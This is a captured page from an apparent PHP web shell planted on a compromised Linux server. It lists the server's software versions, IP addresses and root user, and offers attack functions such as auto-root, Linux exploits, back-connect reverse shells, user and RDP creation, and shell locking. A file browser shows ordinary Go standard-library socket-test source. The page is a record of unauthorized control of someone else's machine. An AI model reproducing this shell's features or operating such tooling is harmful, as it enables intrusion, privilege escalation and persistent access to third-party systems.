Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
net /
internal /
socktest /
[ HOME SHELL ]
Name
Size
Permission
Action
main_test.go
1.07
KB
-rw-r--r--
main_unix_test.go
475
B
-rw-r--r--
main_windows_test.go
478
B
-rw-r--r--
switch.go
4.84
KB
-rw-r--r--
switch_posix.go
1.04
KB
-rw-r--r--
switch_stub.go
454
B
-rw-r--r--
switch_unix.go
752
B
-rw-r--r--
switch_windows.go
730
B
-rw-r--r--
sys_cloexec.go
1003
B
-rw-r--r--
sys_unix.go
4
KB
-rw-r--r--
sys_windows.go
5.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sys_cloexec.go
// Copyright 2015 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build dragonfly freebsd linux netbsd openbsd package socktest import "syscall" // Accept4 wraps syscall.Accept4. func (sw *Switch) Accept4(s, flags int) (ns int, sa syscall.Sockaddr, err error) { so := sw.sockso(s) if so == nil { return syscall.Accept4(s, flags) } sw.fmu.RLock() f := sw.fltab[FilterAccept] sw.fmu.RUnlock() af, err := f.apply(so) if err != nil { return -1, nil, err } ns, sa, so.Err = syscall.Accept4(s, flags) if err = af.apply(so); err != nil { if so.Err == nil { syscall.Close(ns) } return -1, nil, err } sw.smu.Lock() defer sw.smu.Unlock() if so.Err != nil { sw.stats.getLocked(so.Cookie).AcceptFailed++ return -1, nil, so.Err } nso := sw.addLocked(ns, so.Cookie.Family(), so.Cookie.Type(), so.Cookie.Protocol()) sw.stats.getLocked(nso.Cookie).Accepted++ return ns, sa, nil }
Close